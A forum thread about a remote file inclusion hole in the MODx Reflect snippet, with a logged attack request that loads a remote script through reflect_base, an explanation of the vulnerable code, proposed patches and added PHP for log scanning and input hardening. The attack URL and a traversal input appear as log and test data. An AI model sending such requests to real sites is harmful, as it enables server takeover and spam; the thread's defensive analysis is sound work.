    • 15027
    • 4 Posts
    Hi,

    My 0.9.6.2 Modx site has been hacked with a reflect snippets hack :
    http://www.milw0rm.com/exploits/7204

    Is this hack known here?

    I’ve seen these GET in my logs :
    IP www.mymodxsite.com - [24/Nov/2008:10:15:12 +0100] "POST //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.adultfirstdate.com/forum/spider.txt?? HTTP/1.1" 200 1138 "referer" "Opera/9.62 (X11; Linux i686; U; en) Presto/2.1.1"

    He loads a php script for testing security and uploads other scripts easily.

    Sorry for my bad English.

    Julien
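The log line above is the signature of this attack: a request straight to snippet.reflect.php with reflect_base pointing at a remote URL. The following is an added example, not code from this thread, that scans access-log lines in the same virtual-host combined format and reports every direct hit on the snippet file, graded by what reflect_base contained. The log lines, IP addresses and hostnames in it are constructed placeholders, not the ones from the post.

```php
<?php
// Added example, not code from the thread. Scans web-server access-log lines
// for the pattern shown in the first post: a request hitting
// snippet.reflect.php directly, with reflect_base pointing at a remote URL or
// at a parent directory. Log lines below are constructed; the hosts and IPs
// are documentation placeholders, not the ones from the original post.

$sampleLog = <<<'LOG'
203.0.113.5 www.example.com - [24/Nov/2008:10:15:12 +0100] "POST //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://attacker.example/spider.txt?? HTTP/1.1" 200 1138 "-" "Opera/9.62 (X11; Linux i686; U; en) Presto/2.1.1"
198.51.100.7 www.example.com - [24/Nov/2008:10:16:03 +0100] "GET /index.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 www.example.com - [24/Nov/2008:10:17:44 +0100] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../tmp/ HTTP/1.1" 200 1138 "-" "Opera/9.62"
198.51.100.9 www.example.com - [24/Nov/2008:10:18:10 +0100] "GET /assets/snippets/reflect/snippet.reflect.php HTTP/1.1" 200 1138 "-" "curl/7.18"
LOG;

/**
 * Classify one access-log line. Returns null for unrelated requests,
 * otherwise an array describing why the request is suspicious.
 */
function classifyReflectRequest(string $line): ?array
{
    // Virtual-host combined format: client vhost ident [time] "METHOD target HTTP/x" status bytes
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    list(, $client, $time, $method, $target, $status) = $m;

    // Only the snippet file matters; split path and query by regex rather than
    // parse_url(), which would treat the leading "//" as a host name.
    if (!preg_match('#snippet\.reflect\.php(?:\?(.*))?$#i', $target, $pm)) {
        return null;
    }
    $query = isset($pm[1]) ? $pm[1] : '';
    parse_str($query, $params);
    $base = isset($params['reflect_base']) ? (string) $params['reflect_base'] : '';

    // Direct access to the file is never legitimate (it is meant to be pasted
    // into a snippet), so every hit is reported; the reason grades severity.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $base)) {
        $reason = 'remote include via reflect_base';
    } elseif (strpos($base, '..') !== false) {
        $reason = 'directory traversal via reflect_base';
    } else {
        $reason = 'direct request to snippet file';
    }
    return [
        'client' => $client, 'time' => $time, 'method' => $method,
        'status' => (int) $status, 'reflect_base' => $base, 'reason' => $reason,
    ];
}

/** Run the classifier over a whole log and collect the findings. */
function scanAccessLog(string $log): array
{
    $findings = [];
    foreach (explode("\n", trim($log)) as $line) {
        $f = classifyReflectRequest($line);
        if ($f !== null) {
            $findings[] = $f;
        }
    }
    return $findings;
}

foreach (scanAccessLog($sampleLog) as $f) {
    printf("%s %s %s status=%d reflect_base=%s -> %s\n",
        $f['time'], $f['client'], $f['method'], $f['status'], $f['reflect_base'], $f['reason']);
}
```

Every direct request to the file is reported, not only those with a remote URL, because the file has no legitimate reason to be requested over HTTP at all; a 404 in the status column still tells you someone is probing for it.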
      • 26903
      • 1,336 Posts
      I seem to be getting these also on my 0.9.6.1p2 install, from various IP’s but I’m returning either 404’s or 200’s with no output.
        Use MODx, or the cat gets it!
        • 15027
        • 4 Posts
        No output, but he can execute php on your server.

        On my server, he used snippet.reflect.php to load a "php shell".
        Then he used this script to upload 2 php files (a mailer for spam and another php shell),
        then he was spamming .....
          • 16034
          • 107 Posts
          I think a fast fix would be to simply remove the file /assets/snippets/reflect/snippet.reflect.php. It shouldn’t affect your usage of the Reflect snippet.

          It contains the code for pasting into a snippet, and is not meant for being run on its own.

          The reason this hack works is the following two lines:

          $reflect_base = isset($reflect_base) ? $modx->config['base_path'].$reflect_base : $modx->config['base_path']."assets/snippets/reflect/";
          ...SNIP...
          require($reflect_base."configs/default.config.php");

          Since this file is called directly, $modx is not set, and hence $modx->config['base_path'] is an empty string, and $reflect_base is just $reflect_base. So whatever file is given as argument is loaded.

            MODx snippet-glossary 101:
            Ditto = Content Lister -- Wayfinder == Menu Builder -- Jot = Comment Control
            • 16034
            • 107 Posts
            I filed a report to Trac for the Ditto project.

            http://mirror3.cvsdude.com/trac/ditto/codebase/ticket/109
              MODx snippet-glossary 101:
              Ditto = Content Lister -- Wayfinder == Menu Builder -- Jot = Comment Control
              • 21056
              • 327 Posts
              if I try that, it gives an error:

              Warning: require(assets/snippets/reflect/configs/default.config.php) [function.require]: failed to open stream: No such file or directory in /home/XXXXXXXX/public_html/assets/snippets/reflect/snippet.reflect.php on line 60
              
              Fatal error: require() [function.require]: Failed opening required 'assets/snippets/reflect/configs/default.config.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/XXXXXXXX/public_html/assets/snippets/reflect/snippet.reflect.php on line 60
                Author: ManagerManager plugin - customise your ModX manager interface

                Rckt - web development, Sheffield, UK
                • 16034
                • 107 Posts
                Quote from: ncrossland at Nov 24, 2008, 11:24 AM

                if I try that, it gives an error:

                You probably have register_globals set to off?

                If I analyzed the code correctly, the bug is only present with register_globals=on.
                  MODx snippet-glossary 101:
                  Ditto = Content Lister -- Wayfinder == Menu Builder -- Jot = Comment Control
                  • 11975
                  • 2,542 Posts
                  Hi,

                  As the snippet is stored in the db, the file is useless and should be deleted.
                  I’m currently trying a patch on one of my sites that has been attacked.
                  I’ve added at the beginning of the file

                  if(empty($modx->config)) die ('you should not be there !');

                  This should do the trick

                  :-)

                  EDIT: this fix should be tweaked in case $modx->config is filled within the hack.

                    Made with MODx : [url=http://www.copadel.com]copadel, fruits et l
                    • 16034
                    • 107 Posts
                    I think a good way to fix this would be with a define saying whether or not this is called as a snippet.

                    Another way would be not to put snippet contents up as files (especially with the php-extension).

                    If the file was distributed as snippet.reflect.php.txt instead, there would be no issue.
                      MODx snippet-glossary 101:
                      Ditto = Content Lister -- Wayfinder == Menu Builder -- Jot = Comment Control
                      • 3749
                      • 24,544 Posts
                      Quote from: Kleist at Nov 24, 2008, 12:46 PM

                      I think a good way to fix this would be with a define saying whether or not this is called as a snippet.

                      Another way would be not to put snippet contents up as files (especially with the php-extension).

                      If the file was distributed as snippet.reflect.php.txt instead, there would be no issue.

                      Another way might be to set a $_SESSION variable somewhere else (e.g. in Ditto) to a hash of a modx config variable and then check for it at the beginning of reflect snippet.
                        Did I help you? Buy me a beer
                        Get my Book: MODX:The Official Guide
                        MODX info for everyone: http://bobsguides.com/modx.html
                        My MODX Extras
                        Bob's Guides is now hosted at A2 MODX Hosting
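The posts above propose three separate mitigations: a define set by the legitimate caller, an early exit when no $modx is present, and not trusting reflect_base from the request at all. The following is an added example, not the Reflect snippet's own code and not from any of the posters, showing how the head of snippet.reflect.php could combine them, with the vulnerable lines quoted from Kleist's post kept as a comment for comparison. The constant name REFLECT_CALLED_AS_SNIPPET, the function names and the assumption that the snippet stored in the database includes this file are all this example's own.

```php
<?php
// Added example, not the Reflect snippet's own code. It combines the three
// fixes proposed in the thread: a define set by the legitimate caller, a
// check that a real $modx object with a base_path is present (the die() patch,
// made robust against a $modx supplied through register_globals), and a
// realpath() check so reflect_base cannot leave the site root. The constant
// name REFLECT_CALLED_AS_SNIPPET is an assumption, not something MODx defines.

// The vulnerable lines as quoted in the thread, for comparison:
//   $reflect_base = isset($reflect_base) ? $modx->config['base_path'].$reflect_base
//                                        : $modx->config['base_path']."assets/snippets/reflect/";
//   require($reflect_base."configs/default.config.php");
// Requested directly with register_globals=on, $modx is unset, base_path is ''
// and $reflect_base is whatever the query string supplied, so require() loads it.

/** True only when the MODx snippet runner, not a direct HTTP request, included this file. */
function reflectIsCalledAsSnippet($modx)
{
    return defined('REFLECT_CALLED_AS_SNIPPET')
        && is_object($modx)                      // a query-string $modx would be an array
        && !empty($modx->config['base_path']);
}

/**
 * Resolve the directory Reflect should read its configs from. $requested is the
 * snippet parameter (relative to the site root) or null for the default; a value
 * that is absolute, a URL, or escapes the site root is rejected.
 */
function reflectResolveBase($modx, $requested)
{
    $root = realpath($modx->config['base_path']);
    if ($root === false) {
        throw new RuntimeException('base_path does not exist');
    }
    $rel = ($requested === null || $requested === '') ? 'assets/snippets/reflect/' : $requested;
    // Reject "scheme:", "/..." and "\..." prefixes before touching the filesystem.
    if (preg_match('#^([a-z][a-z0-9+.\-]*:|/|\\\\)#i', $rel)) {
        throw new RuntimeException('reflect_base must be a relative path');
    }
    $dir = realpath($root . DIRECTORY_SEPARATOR . $rel);
    if ($dir === false || strpos($dir . DIRECTORY_SEPARATOR, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('reflect_base outside the site root');
    }
    return $dir . DIRECTORY_SEPARATOR;
}

// --- Top of snippet.reflect.php ---------------------------------------------
$modx = isset($modx) ? $modx : null;
if (!reflectIsCalledAsSnippet($modx)) {
    header('HTTP/1.0 403 Forbidden');
    exit('not a valid entry point');
}
$reflect_base = reflectResolveBase($modx, isset($reflect_base) ? $reflect_base : null);
require($reflect_base . 'configs' . DIRECTORY_SEPARATOR . 'default.config.php');

// --- The snippet stored in the database would then be reduced to: -----------
//   define('REFLECT_CALLED_AS_SNIPPET', true);
//   return include $modx->config['base_path'] . 'assets/snippets/reflect/snippet.reflect.php';
```

The is_object() test is what addresses the EDIT in the die() post: with register_globals on, a request can populate $modx from the query string, but only as an array, which this check refuses. The realpath() comparison appends a directory separator to both sides so that a sibling directory whose name merely begins with the site root's name is not accepted as being inside it.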